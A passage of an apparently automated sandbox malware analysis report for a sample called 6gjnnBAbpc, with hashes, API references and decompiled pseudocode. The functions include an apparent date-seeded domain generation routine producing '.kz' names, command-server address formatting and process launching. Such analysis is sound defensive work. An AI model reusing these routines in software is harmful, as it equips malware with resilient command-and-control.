                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2356641437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd093ba78cb55f5ec8a20eb079ecf1fdcd36511c02614f1ce0a8f2dc342cb654
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6611E5B4A0A301AFC754AF65D18455BBBE0FF88710F419C2EF49487311D778D8808F86
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2356641437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: 356f6c3cb5459cc125aadc62c037ca1cfb0d2d0be776f4231c60a2ad830c665d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC01EEB4A097109FC300DF15D19465BBBF0FF89710F14895EE88887324D3799945CF8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				char _v172;
                                                                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                                                        					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                                                        					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                                                        					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                                                        					_v32 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                                                        						E04007D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                                                        						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                                                        						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                                                        						_v40 = _t50;
                                                                                                                                                                                                                                                                                                        						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                                        							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v12 = _v172;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                                        						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                                                        						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                                                        						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x040092e9
                                                                                                                                                                                                                                                                                                        0x040092f4
                                                                                                                                                                                                                                                                                                        0x04009308
                                                                                                                                                                                                                                                                                                        0x0400931d
                                                                                                                                                                                                                                                                                                        0x04009322
                                                                                                                                                                                                                                                                                                        0x04009328
                                                                                                                                                                                                                                                                                                        0x0400932b
                                                                                                                                                                                                                                                                                                        0x0400933d
                                                                                                                                                                                                                                                                                                        0x04009357
                                                                                                                                                                                                                                                                                                        0x04009371
                                                                                                                                                                                                                                                                                                        0x04009376
                                                                                                                                                                                                                                                                                                        0x04009379
                                                                                                                                                                                                                                                                                                        0x04009380
                                                                                                                                                                                                                                                                                                        0x04009396
                                                                                                                                                                                                                                                                                                        0x04009382
                                                                                                                                                                                                                                                                                                        0x04009388
                                                                                                                                                                                                                                                                                                        0x04009388
                                                                                                                                                                                                                                                                                                        0x040093a8
                                                                                                                                                                                                                                                                                                        0x040093c4
                                                                                                                                                                                                                                                                                                        0x040093c9
                                                                                                                                                                                                                                                                                                        0x040093db
                                                                                                                                                                                                                                                                                                        0x040093e7
                                                                                                                                                                                                                                                                                                        0x040093f0
                                                                                                                                                                                                                                                                                                        0x0400933a
                                                                                                                                                                                                                                                                                                        0x0400933a
                                                                                                                                                                                                                                                                                                        0x0400933d
                                                                                                                                                                                                                                                                                                        0x040093fe

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 04009308
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                                                        • String ID: .kz
                                                                                                                                                                                                                                                                                                        • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                                                        • Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                                                        • Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                        • API String ID: 4179344489-336475711
                                                                                                                                                                                                                                                                                                        • Opcode ID: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f2bcc72b8dabd0ea27cf558def7b07d1e8a971bd1b24fbec1df22c7a9c3dfa5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E2153F07083019FD714AF25E54529ABBE0BF84348F45C82EE4C98B346D7B898C5CB8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 4179344489-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb42ebfda6e5f1041a8337c8b64236a6e2dcba6debdfecdf6c0171dcc16b8b9a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE213DB06092559FC714EF25E59425ABBE0BBD0348F45882EE4894B351D7B898C9CB8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                                        			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                                                        						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                                                                                                                                                        						L0400B1EC();
                                                                                                                                                                                                                                                                                                        						_v20 = _t31;
                                                                                                                                                                                                                                                                                                        						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x040078d6
                                                                                                                                                                                                                                                                                                        0x040078de
                                                                                                                                                                                                                                                                                                        0x040078f8
                                                                                                                                                                                                                                                                                                        0x0400790a
                                                                                                                                                                                                                                                                                                        0x04007922
                                                                                                                                                                                                                                                                                                        0x0400792d
                                                                                                                                                                                                                                                                                                        0x0400792e
                                                                                                                                                                                                                                                                                                        0x04007933
                                                                                                                                                                                                                                                                                                        0x0400795a
                                                                                                                                                                                                                                                                                                        0x04007960
                                                                                                                                                                                                                                                                                                        0x04007907
                                                                                                                                                                                                                                                                                                        0x04007907
                                                                                                                                                                                                                                                                                                        0x04007965
                                                                                                                                                                                                                                                                                                        0x04007965
                                                                                                                                                                                                                                                                                                        0x0400796f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s:%u
                                                                                                                                                                                                                                                                                                        • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                                                        • Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04001E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                                        					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                                        					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                                                        						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                                                                        0x04001e66
                                                                                                                                                                                                                                                                                                        0x04001e71
                                                                                                                                                                                                                                                                                                        0x04001e8b
                                                                                                                                                                                                                                                                                                        0x04001e93
                                                                                                                                                                                                                                                                                                        0x04001ebc
                                                                                                                                                                                                                                                                                                        0x04001ec2
                                                                                                                                                                                                                                                                                                        0x04001ecb
                                                                                                                                                                                                                                                                                                        0x04001ecb
                                                                                                                                                                                                                                                                                                        0x04001ebc
                                                                                                                                                                                                                                                                                                        0x04001ed4

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 04001EC2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                                                                                                        • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                                                        • Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                        			E00416BA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				signed int* _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                                                                                                                        				signed int* _t35;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t62;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t64;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t60 = _a4;
                                                                                                                                                                                                                                                                                                        				_t45 =  *_t60;
                                                                                                                                                                                                                                                                                                        				_t59 = _t45 + 0x14;
                                                                                                                                                                                                                                                                                                        				 *_t61 = _t59;
                                                                                                                                                                                                                                                                                                        				EnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        				_t32 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                                                                        				_t62 = _t61 - 4;
                                                                                                                                                                                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                                                                                                                                                                                        					_t33 =  *((intOrPtr*)(_t45 + 0x10));
                                                                                                                                                                                                                                                                                                        					if(_t33 == 0x3ffffffe) {
